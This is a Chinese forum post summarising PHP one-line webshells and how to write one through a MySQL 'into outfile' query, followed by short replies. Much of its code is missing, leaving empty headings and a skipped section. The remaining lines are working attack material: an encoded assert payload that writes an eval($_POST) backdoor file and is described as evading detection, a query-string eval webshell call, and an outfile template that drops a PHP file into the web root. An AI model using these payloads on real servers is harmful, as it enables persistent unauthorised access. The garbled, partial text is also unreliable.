vito 话唠
  • 1500发帖数
  • 189主题数
  • 0关注数
  • 1粉丝
开启左侧

PHP一句话木马小结与SQL语句写一句话木马

[复制链接]
vito 发表于 2019-10-14 23:13:01 | 显示全部楼层 |阅读模式 打印 上一主题 下一主题

                               
登录/注册后可看大图


一、基础类的一句话--功能仅限于验证漏洞了,实际中非常容易被查出出来:


二、编码的替换的类型:

//会生成

//php在html内部的一种嵌入方式


三、其他类型:

//?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
//菜刀连接 躲避检测 密码pass

//显示某文件
//运行远程shell
五、无关键函数类型:


http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass

六、补充知识点:
SQL写一句话(MySQL):
select "" into outfile "/home/webaccount/projectname/www/*.php"
#前面是一句话内容 后面是绝对路径www下的PHP文件,同理其他脚本也可以!
以上就是PHP一句话木马小结与SQL语句写一句话木马的详细内容,更多请关注其它相关文章!
更多技巧请《转发 + 关注》哦!

精彩评论4

刘伟 发表于 2019-10-14 23:14:36 | 显示全部楼层
线上一般禁用system,exec等危险函数,毛用都没有
刘伟 发表于 2019-10-14 23:14:36 | 显示全部楼层
还是要多注意才行
立森影像LESU 发表于 2019-10-14 23:14:36 | 显示全部楼层
转发了
gyzgdq 发表于 2019-10-14 23:14:36 | 显示全部楼层
转发了
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

猜你喜欢
在线客服邮箱
wxcy#wkgb.net

邮箱地址#换为@

Powered by 创意电子 ©2018-现在 专注资源实战分享源码下载站联盟商城